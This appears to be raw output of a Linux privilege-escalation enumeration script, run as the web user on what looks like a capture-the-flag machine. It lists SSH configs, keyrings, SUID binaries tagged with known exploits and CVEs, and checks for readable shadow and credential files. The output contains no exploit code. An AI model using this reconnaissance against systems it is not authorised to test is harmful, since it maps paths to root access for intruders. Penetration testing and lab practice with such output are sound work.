yes transfer logging = no timeout = 600 refuse options = checksum dry-run dont compress = *.gz *.tgz *.zip *.z *.rpm *.deb *.iso *.bz2 *.tbz ╔══════════╣ Analyzing Ldap Files (limit 70) The password hash is from the {SSHA} to 'structural' drwxr-xr-x 2 root root 4096 Jan 16 09:49 /etc/ldap ╔══════════╣ Searching ssl/ssh files ChallengeResponseAuthentication no UsePAM yes PasswordAuthentication yes ══╣ Some certificates were found (out limited): /etc/pollinate/entropy.ubuntu.com.pem 44091PSTORAGE_CERTSBIN ══╣ Some home ssh config file was found /usr/share/openssh/sshd_config ChallengeResponseAuthentication no UsePAM yes X11Forwarding yes PrintMotd no AcceptEnv LANG LC_* Subsystem sftp /usr/lib/openssh/sftp-server ══╣ /etc/hosts.allow file found, trying to read the rules: /etc/hosts.allow Searching inside /etc/ssh/ssh_config for interesting info Host * SendEnv LANG LC_* HashKnownHosts yes GSSAPIAuthentication yes ╔══════════╣ Analyzing PAM Auth Files (limit 70) drwxr-xr-x 2 root root 4096 Feb 6 10:01 /etc/pam.d -rw-r--r-- 1 root root 2133 Mar 30 2022 /etc/pam.d/sshd ╔══════════╣ Searching tmux sessions ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-shell-sessions tmux 2.6 /tmp/tmux-33 ╔══════════╣ Analyzing Cloud Init Files (limit 70) -rw-r--r-- 1 root root 3659 Nov 28 16:50 /etc/cloud/cloud.cfg lock_passwd: True ╔══════════╣ Analyzing Keyring Files (limit 70) drwxr-xr-x 2 root root 4096 Feb 6 10:00 /usr/share/keyrings ╔══════════╣ Searching uncommon passwd files (splunk) passwd file: /etc/pam.d/passwd passwd file: /etc/passwd passwd file: /usr/share/bash-completion/completions/passwd passwd file: /usr/share/lintian/overrides/passwd ╔══════════╣ Analyzing Github Files (limit 70) drwxr-xr-x 3 root root 4096 Nov 20 22:05 /usr/lib/node_modules/npm/node_modules/meant/.github drwxr-xr-x 3 root root 4096 Nov 20 22:05 /usr/lib/node_modules/npm/node_modules/node-gyp/.github drwxr-xr-x 2 root root 4096 Feb 6 10:01 /usr/lib/node_modules/npm/node_modules/npm-normalize-package-bin/.github drwxr-xr-x 3 www-data www-data 4096 Nov 20 21:59 /var/www/api/vendor/bramus/router/.github drwxr-xr-x 3 www-data www-data 4096 Nov 20 21:59 /var/www/api/vendor/phenx/php-font-lib/.github drwxr-xr-x 3 www-data www-data 4096 Nov 20 21:59 /var/www/api/vendor/sabberworm/php-css-parser/.github drwxr-xr-x 8 www-data www-data 4096 Nov 20 21:59 /var/www/api/vendor/bramus/router/.git drwxr-xr-x 8 www-data www-data 4096 Nov 20 21:59 /var/www/api/vendor/dompdf/dompdf/.git drwxr-xr-x 8 www-data www-data 4096 Nov 20 21:59 /var/www/api/vendor/phenx/php-font-lib/.git drwxr-xr-x 8 www-data www-data 4096 Nov 20 21:59 /var/www/api/vendor/phenx/php-svg-lib/.git drwxr-xr-x 8 www-data www-data 4096 Nov 20 21:59 /var/www/api/vendor/sabberworm/php-css-parser/.git ╔══════════╣ Analyzing PGP-GPG Files (limit 70) /usr/bin/gpg netpgpkeys Not Found netpgp Not Found -rw-r--r-- 1 root root 360 Nov 20 21:52 /etc/apt/trusted.gpg.d/ondrej_ubuntu_php.gpg -rw-r--r-- 1 root root 2796 Mar 29 2021 /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-archive.gpg -rw-r--r-- 1 root root 2794 Mar 29 2021 /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-cdimage.gpg -rw-r--r-- 1 root root 1733 Mar 29 2021 /etc/apt/trusted.gpg.d/ubuntu-keyring-2018-archive.gpg -rw-r--r-- 1 root root 3267 Jul 4 2022 /usr/share/gnupg/distsigkey.gpg -rw-r--r-- 1 root root 2206 Nov 20 22:04 /usr/share/keyrings/nodesource.gpg -rw-r--r-- 1 root root 2247 Nov 17 18:06 /usr/share/keyrings/ubuntu-advantage-cc-eal.gpg -rw-r--r-- 1 root root 2274 Nov 17 18:06 /usr/share/keyrings/ubuntu-advantage-cis.gpg -rw-r--r-- 1 root root 2236 Nov 17 18:06 /usr/share/keyrings/ubuntu-advantage-esm-apps.gpg -rw-r--r-- 1 root root 2264 Nov 17 18:06 /usr/share/keyrings/ubuntu-advantage-esm-infra-trusty.gpg -rw-r--r-- 1 root root 2275 Nov 17 18:06 /usr/share/keyrings/ubuntu-advantage-fips.gpg -rw-r--r-- 1 root root 2250 Nov 17 18:06 /usr/share/keyrings/ubuntu-advantage-realtime-kernel.gpg -rw-r--r-- 1 root root 2235 Nov 17 18:06 /usr/share/keyrings/ubuntu-advantage-ros.gpg -rw-r--r-- 1 root root 7399 Sep 17 2018 /usr/share/keyrings/ubuntu-archive-keyring.gpg -rw-r--r-- 1 root root 6713 Oct 27 2016 /usr/share/keyrings/ubuntu-archive-removed-keys.gpg -rw-r--r-- 1 root root 4097 Feb 6 2018 /usr/share/keyrings/ubuntu-cloudimage-keyring.gpg -rw-r--r-- 1 root root 0 Jan 17 2018 /usr/share/keyrings/ubuntu-cloudimage-removed-keys.gpg -rw-r--r-- 1 root root 1227 May 27 2010 /usr/share/keyrings/ubuntu-master-keyring.gpg -rw-r--r-- 1 root root 2867 Feb 22 2018 /usr/share/popularity-contest/debian-popcon.gpg -rw-r--r-- 1 root root 2236 Feb 8 12:14 /var/lib/ubuntu-advantage/apt-esm/etc/apt/trusted.gpg.d/ubuntu-advantage-esm-apps.gpg -rw------- 1 www-data www-data 1200 Feb 12 10:54 /var/www/.gnupg/trustdb.gpg drwx------ 3 dev dev 4096 Jan 16 09:49 /home/dev/.gnupg drwx------ 3 www-data www-data 4096 Feb 12 10:54 /var/www/.gnupg ╔══════════╣ Analyzing Postfix Files (limit 70) -rw-r--r-- 1 root root 675 Apr 2 2018 /usr/share/bash-completion/completions/postfix ╔══════════╣ Analyzing FTP Files (limit 70) -rw-r--r-- 1 root root 69 Nov 8 11:33 /etc/php/7.4/mods-available/ftp.ini -rw-r--r-- 1 root root 69 Oct 28 17:39 /etc/php/8.1/mods-available/ftp.ini -rw-r--r-- 1 root root 69 Jan 6 15:17 /etc/php/8.2/mods-available/ftp.ini -rw-r--r-- 1 root root 69 Jan 13 10:42 /usr/share/php7.4-common/common/ftp.ini -rw-r--r-- 1 root root 69 Feb 3 09:35 /usr/share/php8.2-common/common/ftp.ini ╔══════════╣ Analyzing Bind Files (limit 70) -rw-r--r-- 1 root root 856 Apr 2 2018 /usr/share/bash-completion/completions/bind -rw-r--r-- 1 root root 856 Apr 2 2018 /usr/share/bash-completion/completions/bind ╔══════════╣ Analyzing Interesting logs Files (limit 70) -rw-r--r-- 1 root root 8939 Feb 12 10:42 /var/log/nginx/access.log -rw-r--r-- 1 root root 34729 Feb 12 10:42 /var/log/nginx/error.log ╔══════════╣ Analyzing Other Interesting Files (limit 70) -rw-r--r-- 1 root root 3771 Apr 4 2018 /etc/skel/.bashrc -rw-r--r-- 1 dev dev 3771 Jan 10 12:55 /home/dev/.bashrc -rw-r--r-- 1 root root 807 Apr 4 2018 /etc/skel/.profile -rw-r--r-- 1 dev dev 807 Jan 10 12:55 /home/dev/.profile ╔═══════════════════╗ ═══════════════════════════════╣ Interesting Files ╠═══════════════════════════════ ╚═══════════════════╝ ╔══════════╣ SUID - Check easy privesc, exploits and write perms ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid -rwsr-xr-x 1 root root 43K Sep 16 2020 /bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8 -rwsr-xr-x 1 root root 63K Jun 28 2019 /bin/ping -rwsr-xr-x 1 root root 31K Aug 11 2016 /bin/fusermount -rwsr-xr-x 1 root root 27K Sep 16 2020 /bin/umount ---> BSD/Linux(08-1996) -rwsr-xr-x 1 root root 44K Nov 29 12:25 /bin/su -rwsr-xr-x 1 root root 59K Nov 29 12:25 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997) -rwsr-xr-x 1 root root 75K Nov 29 12:25 /usr/bin/chfn ---> SuSE_9.3/10 -rwsr-xr-x 1 root root 146K Jan 16 14:40 /usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable -rwsr-xr-x 1 root root 37K Nov 29 12:25 /usr/bin/newgidmap -rwsr-xr-x 1 root root 19K Jun 28 2019 /usr/bin/traceroute6.iputils -rwsr-xr-x 1 root root 40K Nov 29 12:25 /usr/bin/newgrp ---> HP-UX_10.20 -rwsr-xr-x 1 root root 37K Nov 29 12:25 /usr/bin/newuidmap -rwsr-xr-x 1 root root 44K Nov 29 12:25 /usr/bin/chsh -rwsr-xr-x 1 root root 75K Nov 29 12:25 /usr/bin/gpasswd -rwsr-sr-x 1 daemon daemon 51K Feb 20 2018 /usr/bin/at ---> RTru64_UNIX_4.0g(CVE-2002-1614) -rwsr-xr-x 1 root root 99K Nov 23 2018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic -rwsr-xr-- 1 root messagebus 42K Oct 25 13:03 /usr/lib/dbus-1.0/dbus-daemon-launch-helper -rwsr-xr-x 1 root root 128K Dec 1 08:52 /usr/lib/snapd/snap-confine ---> Ubuntu_snapd<2.37_dirty_sock_Local_Privilege_Escalation(CVE-2019-7304) -rwsr-xr-x 1 root root 427K Mar 30 2022 /usr/lib/openssh/ssh-keysign -rwsr-xr-x 1 root root 10K Mar 28 2017 /usr/lib/eject/dmcrypt-get-device -rwsr-xr-x 1 root root 14K Jan 12 2022 /usr/lib/policykit-1/polkit-agent-helper-1 ╔══════════╣ SGID ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid -rwxr-sr-x 1 root ssh 355K Mar 30 2022 /usr/bin/ssh-agent -rwxr-sr-x 1 root tty 31K Sep 16 2020 /usr/bin/wall -rwxr-sr-x 1 root shadow 23K Nov 29 12:25 /usr/bin/expiry -rwxr-sr-x 1 root mlocate 43K Mar 1 2018 /usr/bin/mlocate -rwxr-sr-x 1 root shadow 71K Nov 29 12:25 /usr/bin/chage -rwxr-sr-x 1 root tty 14K Jan 17 2018 /usr/bin/bsd-write -rwxr-sr-x 1 root crontab 39K May 10 2022 /usr/bin/crontab -rwsr-sr-x 1 daemon daemon 51K Feb 20 2018 /usr/bin/at ---> RTru64_UNIX_4.0g(CVE-2002-1614) -rwxr-sr-x 1 root utmp 10K Mar 11 2016 /usr/lib/x86_64-linux-gnu/utempter/utempter -rwxr-sr-x 1 root shadow 34K Feb 2 09:24 /sbin/pam_extrausers_chkpwd -rwxr-sr-x 1 root shadow 34K Feb 2 09:24 /sbin/unix_chkpwd ╔══════════╣ Checking misconfigurations of ld.so ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#ld-so /etc/ld.so.conf include /etc/ld.so.conf.d/*.conf /etc/ld.so.conf.d /etc/ld.so.conf.d/libc.conf /usr/local/lib /etc/ld.so.conf.d/x86_64-linux-gnu.conf /usr/local/lib/x86_64-linux-gnu /lib/x86_64-linux-gnu /usr/lib/x86_64-linux-gnu ╔══════════╣ Capabilities ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities Current env capabilities: Current: = Current proc capabilities: CapInh: 0000000000000000 CapPrm: 0000000000000000 CapEff: 0000000000000000 CapBnd: 0000003fffffffff CapAmb: 0000000000000000 Parent Shell capabilities: 0x0000000000000000= Files with capabilities (limited to 50): /usr/bin/mtr-packet = cap_net_raw+ep ╔══════════╣ Users with capabilities ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities ╔══════════╣ AppArmor binary profiles -rw-r--r-- 1 root root 3194 Mar 26 2018 sbin.dhclient -rw-r--r-- 1 root root 125 Nov 23 2018 usr.bin.lxc-start -rw-r--r-- 1 root root 2857 Apr 7 2018 usr.bin.man -rw-r--r-- 1 root root 28486 Nov 28 04:56 usr.lib.snapd.snap-confine.real -rw-r--r-- 1 root root 1550 Apr 24 2018 usr.sbin.rsyslogd -rw-r--r-- 1 root root 1353 Mar 31 2018 usr.sbin.tcpdump ╔══════════╣ Files with ACLs (limited to 50) ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#acls files with acls in searched folders Not Found ╔══════════╣ .sh files in path ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#script-binaries-in-path /usr/local/sbin/cleancache.sh /usr/bin/gettext.sh ╔══════════╣ Executable files potentially added by user (limit 70) 2023-02-12+11:35:47.5262858350 /var/lib/lxcfs/cgroup/memory/system.slice/systemd-logind.service/cgroup.event_control 2023-02-12+11:35:47.5233455830 /var/lib/lxcfs/cgroup/memory/system.slice/ifup@eth0.service/cgroup.event_control 2023-02-12+11:35:47.5193169360 /var/lib/lxcfs/cgroup/memory/system.slice/system-getty.slice/cgroup.event_control 2023-02-12+11:35:47.5144354070 /var/lib/lxcfs/cgroup/memory/system.slice/systemd-timesyncd.service/cgroup.event_control 2023-02-12+11:35:47.5108056660 /var/lib/lxcfs/cgroup/memory/system.slice/dbus.service/cgroup.event_control 2023-02-12+11:35:47.5063616340 /var/lib/lxcfs/cgroup/memory/system.slice/dev-hugepages.mount/cgroup.event_control 2023-02-12+11:35:47.5014851400 /var/lib/lxcfs/cgroup/memory/system.slice/acpid.service/cgroup.event_control 2023-02-12+11:35:47.4949269720 /var/lib/lxcfs/cgroup/memory/system.slice/php7.4-fpm.service/cgroup.event_control 2023-02-12+11:35:47.4863812300 /var/lib/lxcfs/cgroup/memory/system.slice/system-lvm2\x2dpvscan.slice/cgroup.event_control 2023-02-12+11:35:47.4799478780 /var/lib/lxcfs/cgroup/memory/system.slice/systemd-resolved.service/cgroup.event_control 2023-02-12+11:35:47.4738381840 /var/lib/lxcfs/cgroup/memory/system.slice/lvm2-lvmetad.service/cgroup.event_control 2023-02-12+11:35:47.4631773480 /var/lib/lxcfs/cgroup/memory/system.slice/proc-sys-fs-binfmt_misc.mount/cgroup.event_control 2023-02-12+11:35:47.4262852130 /var/lib/lxcfs/cgroup/memory/system.slice/snapd.socket/cgroup.event_control 2023-02-12+11:35:47.4234191460 /var/lib/lxcfs/cgroup/memory/system.slice/lxcfs.service/cgroup.event_control 2023-02-12+11:35:47.4202998740 /var/lib/lxcfs/cgroup/memory/system.slice/cloud-config.service/cgroup.event_control 2023-02-12+11:35:47.4170212400 /var/lib/lxcfs/cgroup/memory/system.slice/starting-page.service/cgroup.event_control 2023-02-12+11:35:47.4141705950 /var/lib/lxcfs/cgroup/memory/system.slice/rsyslog.service/cgroup.event_control 2023-02-12+11:35:47.4113842460 /var/lib/lxcfs/cgroup/memory/system.slice/uuidd.service/cgroup.event_control 2023-02-12+11:35:47.4083850090 /var/lib/lxcfs/cgroup/memory/system.slice/snapd.seeded.service/cgroup.event_control 2023-02-12+11:35:47.4049923800 /var/lib/lxcfs/cgroup/memory/system.slice/vgauth.service/cgroup.event_control 2023-02-12+11:35:47.4016353930 /var/lib/lxcfs/cgroup/memory/system.slice/dev-mqueue.mount/cgroup.event_control 2023-02-12+11:35:47.3982935590 /var/lib/lxcfs/cgroup/memory/system.slice/ssh.service/cgroup.event_control 2023-02-12+11:35:47.3940425300 /var/lib/lxcfs/cgroup/memory/system.slice/lxd.socket/cgroup.event_control 2023-02-12+11:35:47.3897399070 /var/lib/lxcfs/cgroup/memory/system.slice/atd.service/cgroup.event_control 2023-02-12+11:35:47.3866268420 /var/lib/lxcfs/cgroup/memory/system.slice/systemd-journald.service/cgroup.event_control 2023-02-12+11:35:47.3834444920 /var/lib/lxcfs/cgroup/memory/system.slice/cloud-init-local.service/cgroup.event_control 2023-02-12+11:35:47.3803600670 /var/lib/lxcfs/cgroup/memory/system.slice/accounts-daemon.service/cgroup.event_control 2023-02-12+11:35:47.3771589270 /var/lib/lxcfs/cgroup/memory/system.slice/auditd.service/cgroup.event_control 2023-02-12+11:35:47.3739546510 /var/lib/lxcfs/cgroup/memory/system.slice/sys-kernel-debug.mount/cgroup.event_control 2023-02-12+11:35:47.3706797350 /var/lib/lxcfs/cgroup/memory/system.slice/networkd-dispatcher.service/cgroup.event_control 2023-02-12+11:35:47.3675222700 /var/lib/lxcfs/cgroup/memory/system.slice/polkit.service/cgroup.event_control 2023-02-12+11:35:47.3640197090 /var/lib/lxcfs/cgroup/memory/system.slice/dev-mapper-ubuntu\x2d\x2dvg\x2dswap.swap/cgroup.event_control 2023-02-12+11:35:47.3606448570 /var/lib/lxcfs/cgroup/memory/system.slice/sys-kernel-config.mount/cgroup.event_control 2023-02-12+11:35:47.3571659270 /var/lib/lxcfs/cgroup/memory/system.slice/boot.mount/cgroup.event_control 2023-02-12+11:35:47.3527322630 /var/lib/lxcfs/cgroup/memory/system.slice/nginx.service/cgroup.event_control 2023-02-12+11:35:47.3484020380 /var/lib/lxcfs/cgroup/memory/system.slice/sys-fs-fuse-connections.mount/cgroup.event_control 2023-02-12+11:35:47.3413328120 /var/lib/lxcfs/cgroup/memory/system.slice/cron.service/cgroup.event_control 2023-02-12+11:35:47.3322267170 /var/lib/lxcfs/cgroup/memory/system.slice/systemd-udevd.service/cgroup.event_control 2023-02-12+11:35:47.3270985900 /var/lib/lxcfs/cgroup/memory/system.slice/systemd-networkd.service/cgroup.event_control 2023-02-12+11:35:47.3233772660 /var/lib/lxcfs/cgroup/memory/system.slice/open-vm-tools.service/cgroup.event_control 2023-02-12+11:35:47.3197360280 /var/lib/lxcfs/cgroup/memory/system.slice/irqbalance.service/cgroup.event_control 2023-02-12+11:35:47.3166884870 /var/lib/lxcfs/cgroup/memory/system.slice/cgroup.event_control 2023-02-12+11:35:47.3126134820 /var/lib/lxcfs/cgroup/memory/user.slice/cgroup.event_control 2023-02-12+11:35:47.3092801180 /var/lib/lxcfs/cgroup/memory/cgroup.event_control 2023-02-08+12:57:17.7808908480 /usr/local/sbin/cleancache.sh 2023-01-13+10:54:47.4696015670 /usr/local/sbin/laurel 2022-11-20+21:59:04.6543265010 /var/www/api/vendor/sabberworm/php-css-parser/bin/quickdump.php 2022-11-20+21:59:04.5303264290 /var/www/api/vendor/bramus/router/demo/index.php 2022-11-20+21:59:04.5303264290 /var/www/api/vendor/bramus/router/README.md 2022-11-20+21:53:41.5014786250 /usr/local/bin/composer ╔══════════╣ Unexpected in root /vmlinuz /initrd.img.old /vmlinuz.old /initrd.img ╔══════════╣ Files (scripts) in /etc/profile.d/ ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#profiles-files total 36 drwxr-xr-x 2 root root 4096 Feb 6 10:01 . drwxr-xr-x 99 root root 4096 Feb 6 10:02 .. -rw-r--r-- 1 root root 96 Sep 27 2019 01-locale-fix.sh -rw-r--r-- 1 root root 1557 Dec 4 2017 Z97-byobu.sh -rwxr-xr-x 1 root root 3417 Jun 3 2020 Z99-cloud-locale-test.sh -rwxr-xr-x 1 root root 873 Jun 3 2020 Z99-cloudinit-warnings.sh -rw-r--r-- 1 root root 835 Feb 23 2022 apps-bin-path.sh -rw-r--r-- 1 root root 664 Apr 2 2018 bash_completion.sh -rw-r--r-- 1 root root 1003 Dec 29 2015 cedilla-portuguese.sh ╔══════════╣ Permissions in init, init.d, systemd, and rc.d ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#init-init-d-systemd-and-rc-d ═╣ Hashes inside passwd file? ........... No ═╣ Writable passwd file? ................ No ═╣ Credentials in fstab/mtab? ........... No ═╣ Can I read shadow files? ............. No ═╣ Can I read shadow plists? ............ No ═╣ Can I write shadow plists? ........... No ═╣ Can I read opasswd file? ............. No ═╣ Can I write in network-scripts? ...... No ═╣ Can I read root folder? .............. No ╔══════════╣ Searching root files in home dirs (limit 30) /home/ /home/dev/.bash_history /root/ /var/www/html /var/www/starting-page/blog/.next/trace /var/www/starting-page/blog/.next/static /var/www/starting-page/blog/.next/static/Z79wh4kSTt439cxBUytQN /var/www/starting-page/blog/.next/static/Z79wh4kSTt439cxBUytQN/_buildManifest.js /var/www/starting-page/blog/.next/static/Z79wh4kSTt439cxBUytQN/_ssgManifest.js /var/www/starting-page/blog/.next/static/chunks /var/www/starting-page/blog/.next/static/chunks/polyfills-c67a75d1b6f99dc8.js /var/www/starting-page/blog/.next/static/chunks/pages /var/www/starting-page/blog/.next/static/chunks/pages/_app-df511a3677d160f6.js /var/www/starting-page/blog/.next/static/chunks/pages/index-c95e13dd48858e5b.js /var/www/starting-page/blog/.next/static/chunks/pages/_error-dfcfa5bb62767c20.js /var/www/starting-page/blog/.next/static/chunks/main-50de763069eba4b2.js /var/www/starting-page/blog/.next/static/chunks/webpack-ee7e63bc15b31913.js /var/www/starting-page/blog/.next/static/chunks/framework-8c5acb0054140387.js /var/www/starting-page/blog/.next/export-marker.json /var/www/starting-page/blog/.next/routes-manifest.json /var/www/starting-page/blog/.next/build-manifest.json /var/www/starting-page/blog/.next/package.json /var/www/starting-page/blog/.next/BUILD_ID /var/www/starting-page/blog/.next/cache/webpack/client-production/1.pack /var/www/starting-page/blog/.next/cache/webpack/client-production/index.pack /var/www/starting-page/blog/.next/cache/webpack/client-production/2.pack /var/www/starting-page/blog/.next/cache/webpack/client-production/0.pack /var/www/starting-page/blog/.next/next-server.js.nft.json /var/www/starting-page/blog/.next/react-loadable-manifest.json /var/www/starting-page/blog/.next/images-manifest.json ╔══════════╣ Searching folders owned by me containing others files on it (limit 100) /var/www /var/www/starting-page/blog/.next /var/www/starting-page/blog/.next/cache/webpack/client-production ╔══════════╣ Readable files belonging to root and readable by me but not world readable ╔══════════╣ Modified interesting files in the last 5mins (limit 100) /var/www/api/vendor/dompdf/dompdf/lib/fonts/dompdf_font_family_cache.php /var/log/syslog /var/log/auth.log /var/log/journal/69623df55e8444d7934baf570db9aa6e/system@cbe6bc332f5a4c84902df897c681a4f0-00000000000bf706-0005f47f108202aa.journal /var/log/journal/69623df55e8444d7934baf570db9aa6e/system@cbe6bc332f5a4c84902df897c681a4f0-00000000000d1e3d-0005f47f18f9fd82.journal /var/log/journal/69623df55e8444d7934baf570db9aa6e/system@cbe6bc332f5a4c84902df897c681a4f0-00000000000e017f-0005f47f1f5c4a0e.journal /var/log/journal/69623df55e8444d7934baf570db9aa6e/system@cbe6bc332f5a4c84902df897c681a4f0-00000000000c7f2d-0005f47f147af12a.journal /var/log/journal/69623df55e8444d7934baf570db9aa6e/system@cbe6bc332f5a4c84902df897c681a4f0-00000000000c2435-0005f47f11d3b2ac.journal /var/log/journal/69623df55e8444d7934baf570db9aa6e/system@cbe6bc332f5a4c84902df897c681a4f0-00000000000c0db6-0005f47f112903ce.journal /var/log/journal/69623df55e8444d7934baf570db9aa6e/system@cbe6bc332f5a4c84902df897c681a4f0-00000000000c6870-0005f47f13cf3936.journal /var/log/journal/69623df55e8444d7934baf570db9aa6e/system@cbe6bc332f5a4c84902df897c681a4f0-00000000000dea14-0005f47f1ebad133.journal /var/log/journal/69623df55e8444d7934baf570db9aa6e/system@cbe6bc332f5a4c84902df897c681a4f0-00000000000c3b13-0005f47f127c6a10.journal /var/log/journal/69623df55e8444d7934baf570db9aa6e/system@cbe6bc332f5a4c84902df897c681a4f0-00000000000dd3b1-0005f47f1e1a54d0.journal /var/log/journal/69623df55e8444d7934baf570db9aa6e/system@cbe6bc332f5a4c84902df897c681a4f0-00000000000d4b86-0005f47f1a485023.journal /var/log/journal/69623df55e8444d7934baf570db9aa6e/system@cbe6bc332f5a4c84902df897c681a4f0-00000000000cc316-0005f47f166bbf4d.journal /var/log/journal/69623df55e8444d7934baf570db9aa6e/system@cbe6bc332f5a4c84902df897c681a4f0-00000000000c95af-0005f47f1520b2c7.journal /var/log/journal/69623df55e8444d7934baf570db9aa6e/system@cbe6bc332f5a4c84902df897c681a4f0-00000000000cd9f8-0005f47f1713b635.journal /var/log/journal/69623df55e8444d7934baf570db9aa6e/system@cbe6bc332f5a4c84902df897c681a4f0-00000000000cac9c-0005f47f15c776b3.journal /var/log/journal/69623df55e8444d7934baf570db9aa6e/system@cbe6bc332f5a4c84902df897c681a4f0-00000000000c5194-0005f47f13224628.journal /var/log/journal/69623df55e8444d7934baf570db9aa6e/system@cbe6bc332f5a4c84902df897c681a4f0-00000000000d8fba-0005f47f1c310ae1.journal /var/log/journal/69623df55e8444d7934baf570db9aa6e/system@cbe6bc332f5a4c84902df897c681a4f0-00000000000dbcdd-0005f47f1d711955.journal /var/log/journal/69623df55e8444d7934baf570db9aa6e/system@cbe6bc332f5a4c84902df897c681a4f0-00000000000d6266-0005f47f1ae82f6e.journal /var/log/journal/69623df55e8444d7934baf570db9aa6e/system@cbe6bc332f5a4c84902df897c681a4f0-00000000000d78e0-0005f47f1b832340.journal /var/log/journal/69623df55e8444d7934baf570db9aa6e/system@cbe6bc332f5a4c84902df897c681a4f0-00000000000cf0dd-0005f47f17b3e3cc.journal /var/log/journal/69623df55e8444d7934baf570db9aa6e/system@cbe6bc332f5a4c84902df897c681a4f0-00000000000d075e-0005f47f185b96a2.journal /var/log/journal/69623df55e8444d7934baf570db9aa6e/system@cbe6bc332f5a4c84902df897c681a4f0-00000000000d34ba-0005f47f199f22b2.journal /var/log/journal/69623df55e8444d7934baf570db9aa6e/system@cbe6bc332f5a4c84902df897c681a4f0-00000000000da62c-0005f47f1cd51824.journal /var/log/journal/69623df55e8444d7934baf570db9aa6e/system.journal /var/log/journal/69623df55e8444d7934baf570db9aa6e/system@cbe6bc332f5a4c84902df897c681a4f0-00000000000e1d9e-0005f47f1fd47a57.journal logrotate 3.11.0 ╔══════════╣ Files inside /var/www (limit 20) total 28 drwxr-xr-x 7 www-data www-data 4096 Feb 12 10:54 . drwxr-xr-x 14 root root 4096 Jan 16 09:49 .. drwx------ 4 www-data www-data 4096 Feb 12 10:43 .config drwx------ 3 www-data www-data 4096 Feb 12 10:54 .gnupg drwxr-xr-x 3 www-data www-data 4096 Jan 16 09:49 api drwxr-xr-x 2 root root 4096 Jan 31 14:01 html drwxr-xr-x 3 www-data www-data 4096 Jan 16 09:49 starting-page ╔══════════╣ Files inside others home (limit 20) /home/dev/.bashrc /home/dev/.bash_logout /home/dev/user.txt /home/dev/.profile /var/www/.config/configstore/update-notifier-npm.json /var/www/.config/lxc/config.yml /var/www/starting-page/blog/pages/index.js /var/www/starting-page/blog/package.json /var/www/starting-page/blog/.next/trace /var/www/starting-page/blog/.next/static/Z79wh4kSTt439cxBUytQN/_buildManifest.js /var/www/starting-page/blog/.next/static/Z79wh4kSTt439cxBUytQN/_ssgManifest.js /var/www/starting-page/blog/.next/static/chunks/polyfills-c67a75d1b6f99dc8.js /var/www/starting-page/blog/.next/static/chunks/pages/_app-df511a3677d160f6.js /var/www/starting-page/blog/.next/static/chunks/pages/index-c95e13dd48858e5b.js /var/www/starting-page/blog/.next/static/chunks/pages/_error-dfcfa5bb62767c20.js /var/www/starting-page/blog/.next/static/chunks/main-50de763069eba4b2.js /var/www/starting-page/blog/.next/static/chunks/webpack-ee7e63bc15b31913.js /var/www/starting-page/blog/.next/static/chunks/framework-8c5acb0054140387.js /var/www/starting-page/blog/.next/export-marker.json /var/www/starting-page/blog/.next/routes-manifest.json grep: write error: Broken pipe ╔══════════╣ Searching installed mail applications ╔══════════╣ Mails (limit 50) ╔══════════╣ Backup files (limited 100) -rw-r--r-- 1 root root 11755 Jan 12 10:12 /usr/share/info/dir.old -rw-r--r-- 1 root root 2746 Jan 23 2020 /usr/share/man/man8/vgcfgbackup.8.gz -rw-r--r-- 1 root root 7867 Nov 7 2016 /usr/share/doc/telnet/README.telnet.old.gz -rw-r--r-- 1 root root 361345 Feb 2 2018 /usr/share/doc/manpages/Changes.old.gz -rwxr-xr-x 1 root root 226 Dec 4 2017 /usr/share/byobu/desktop/byobu.desktop.old -rw-r--r-- 1 root root 217559 Jan 5 18:35 /usr/src/linux-headers-4.15.0-202-generic/.config.old -rw-r--r-- 1 root root 0 Jan 5 18:35 /usr/src/linux-headers-4.15.0-202-generic/include/config/wm831x/backup.h -rw-r--r-- 1 root root 0 Jan 5 18:35 /usr/src/linux-headers-4.15.0-202-generic/include/config/net/team/mode/activebackup.h -rw-r--r-- 1 root root 217559 Nov 28 10:19 /usr/src/linux-headers-4.15.0-201-generic/.config.old -rw-r--r-- 1 root root 0 Nov 28 10:19 /usr/src/linux-headers-4.15.0-201-generic/include/config/wm831x/backup.h -rw-r--r-- 1 root root 0 Nov 28 10:19 /usr/src/linux-headers-4.15.0-201-generic/include/config/net/team/mode/activebackup.h -rw-r--r-- 1 root root 35544 Sep 19 22:14 /usr/lib/open-vm-tools/plugins/vmsvc/libvmbackup.so -rw-r--r-- 1 root root 1802 Aug 15 20:07 /usr/lib/python3/dist-packages/sos/report/plugins/ovirt_engine_backup.py -rw-r--r-- 1 root root 1391 Nov 20 21:44 /usr/lib/python3/dist-packages/sos/report/plugins/__pycache__/ovirt_engine_backup.cpython-36.pyc -rw-r--r-- 1 root root 2765 Aug 6 2020 /etc/apt/sources.list.curtin.old -rw-r--r-- 1 www-data www-data 387580 Nov 20 22:07 /var/www/starting-page/blog/.next/cache/webpack/client-production/index.pack.old -rw-r--r-- 1 root root 8881 Jan 5 18:35 /lib/modules/4.15.0-202-generic/kernel/drivers/net/team/team_mode_activebackup.ko -rw-r--r-- 1 root root 9081 Jan 5 18:35 /lib/modules/4.15.0-202-generic/kernel/drivers/power/supply/wm831x_backup.ko -rw-r--r-- 1 root root 8881 Nov 28 10:19 /lib/modules/4.15.0-201-generic/kernel/drivers/net/team/team_mode_activebackup.ko -rw-r--r-- 1 root root 9081 Nov 28 10:19 /lib/modules/4.15.0-201-generic/kernel/drivers/power/supply/wm831x_backup.ko ╔══════════╣ Searching tables inside readable .db/.sql/.sqlite files (limit 100) Found /var/lib/mlocate/mlocate.db: regular file, no read 